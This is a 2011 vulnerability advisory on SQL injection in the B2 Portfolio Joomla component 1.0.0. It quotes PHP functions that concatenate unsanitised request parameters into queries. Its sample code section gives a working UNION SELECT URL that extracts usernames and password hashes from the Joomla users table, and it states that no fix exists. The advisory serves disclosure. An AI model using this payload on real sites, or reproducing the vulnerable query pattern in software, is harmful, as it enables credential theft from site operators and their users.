B2 Portfolio Joomla Component 1.0.0 Multiple SQL Injection Vulnerability
NameB2 Portfolio
Vendorhttp://www.pulseextensions.com
Versions Affected 1.0.0
AuthorSalvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date2011-01-24
X. INDEX
I.ABOUT THE APPLICATION
II. DESCRIPTION
III.ANALYSIS
IV. SAMPLE CODE
V.FIX
I. ABOUT THE APPLICATION
________________________
B2 Portfolio is a Joomla component to give theuserthe
option to view details of a portfolio item by zoomingit
on hover,and to allow a full view by clicking.
II. DESCRIPTION
_______________
Some parameters are not properly sanitisedbeforebeing
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple SQL Injection
A) Multiple SQL Injection
_________________________
Idandwallidparametersarenotproperly sanitised
before being used in SQL queries. Thiscanbe exploited
to manipulate SQL queries by injecting arbitrary SQL code.
The following are the vulnerable functions:
function getcategoryname(){
$db =& JFactory::getDBO();
$default_category = JRequest::getVar('c',0);if($default_category ==""){
$query_cat ='SELECT default_category FROM #__b2portfolio_config';
$db->setQuery( $query_cat );
$default_category = $db->loadResult();}
$query ='SELECT * FROM #__b2portfolio_category where id='.$default_category;
$db->setQuery( $query );
$cat_data =$this->_db->loadObject($query);return $cat_data;}
function click(){
$db =& JFactory::getDBO();
$date =& JFactory::getDate();
$trackDate = $date->toFormat('%Y-%m-%d');
$query ='UPDATE #__b2portfolio set click = ( click + 1 ) where id ='.$_GET['wallid'];
$db->setQuery( $query );
$db->query();}
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
V. FIX
______
No fix.
